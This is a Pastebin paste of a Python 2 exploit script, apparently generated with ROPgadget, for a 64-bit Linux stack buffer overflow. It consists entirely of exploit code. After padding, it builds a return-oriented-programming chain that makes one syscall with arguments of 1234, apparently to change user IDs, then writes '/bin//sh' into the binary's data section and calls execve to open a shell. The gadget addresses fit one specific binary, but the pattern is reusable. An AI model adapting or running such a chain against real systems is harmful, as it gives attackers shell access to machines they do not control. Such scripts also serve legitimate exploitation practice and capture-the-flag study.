API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Jun 27th, 2017
53
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 11.12 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/env python2
  2. # execve generated by ROPgadget
  3.  
  4. from struct import pack
  5.  
  6. # Padding goes here
  7. p = 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
  8.  
  9. p += pack('<Q', 0x00000000004017e7) # pop rsi ; ret
  10. p += pack('<Q', 1234)
  11. p += pack('<Q', 0x00000000004016d3) # pop rdi ; ret
  12. p += pack('<Q', 1234)
  13. p += pack('<Q', 0x0000000000437205) # pop rdx ; ret
  14. p += pack('<Q', 1234)
  15. p += pack('<Q', 0x000000000041bd9f) # xor rax, rax ; ret
  16. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  17. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  18. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  19. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  20. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  21. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  22. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  23. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  24. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  25. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  26. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  27. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  28. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  29. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  30. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  31. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  32. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  33. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  34. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  35. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  36. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  37. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  38. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  39. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  40. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  41. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  42. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  43. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  44. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  45. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  46. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  47. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  48. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  49. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  50. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  51. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  52. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  53. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  54. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  55. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  56. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  57. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  58. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  59. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  60. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  61. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  62. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  63. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  64. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  65. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  66. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  67. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  68. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  69. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  70. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  71. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  72. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  73. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  74. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  75. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  76. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  77. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  78. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  79. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  80. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  81. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  82. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  83. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  84. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  85. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  86. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  87. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  88. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  89. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  90. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  91. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  92. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  93. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  94. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  95. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  96. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  97. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  98. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  99. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  100. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  101. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  102. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  103. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  104. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  105. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  106. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  107. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  108. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  109. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  110. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  111. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  112. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  113. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  114. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  115. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  116. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  117. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  118. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  119. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  120. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  121. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  122. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  123. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  124. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  125. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  126. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  127. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  128. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  129. p += pack('<Q', 0x0000000000400488) # syscall
  130.  
  131. p += pack('<Q', 0x000000000041bd9f) # xor rax, rax ; ret
  132.  
  133. p += pack('<Q', 0x00000000004017e7) # pop rsi ; ret
  134. p += pack('<Q', 0x00000000006c0000) # @ .data
  135. p += pack('<Q', 0x000000000044d2b4) # pop rax ; ret
  136. p += '/bin//sh'
  137. p += pack('<Q', 0x0000000000467b51) # mov qword ptr [rsi], rax ; ret
  138. p += pack('<Q', 0x00000000004017e7) # pop rsi ; ret
  139. p += pack('<Q', 0x00000000006c0008) # @ .data + 8
  140. p += pack('<Q', 0x000000000041bd9f) # xor rax, rax ; ret
  141. p += pack('<Q', 0x0000000000467b51) # mov qword ptr [rsi], rax ; ret
  142. p += pack('<Q', 0x00000000004016d3) # pop rdi ; ret
  143.  
  144. p += pack('<Q', 0x00000000006c0000) # @ .data
  145.  
  146. p += pack('<Q', 0x00000000004017e7) # pop rsi ; ret
  147. p += pack('<Q', 0x00000000006c0008) # @ .data + 8
  148.  
  149. p += pack('<Q', 0x0000000000437205) # pop rdx ; ret
  150. p += pack('<Q', 0x00000000006c0008) # @ .data + 8
  151.  
  152.  
  153. p += pack('<Q', 0x000000000041bd9f) # xor rax, rax ; ret
  154. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  155. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  156. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  157. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  158. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  159. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  160. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  161. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  162. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  163. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  164. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  165. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  166. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  167. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  168. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  169. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  170. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  171. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  172. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  173. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  174. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  175. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  176. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  177. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  178. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  179. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  180. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  181. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  182. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  183. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  184. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  185. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  186. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  187. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  188. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  189. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  190. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  191. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  192. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  193. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  194. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  195. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  196. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  197. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  198. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  199. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  200. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  201. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  202. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  203. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  204. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  205. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  206. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  207. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  208. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  209. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  210. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  211. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  212. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  213. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  214. p += pack('<Q', 0x0000000000400488) # syscall
  215.  
  216. print p
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!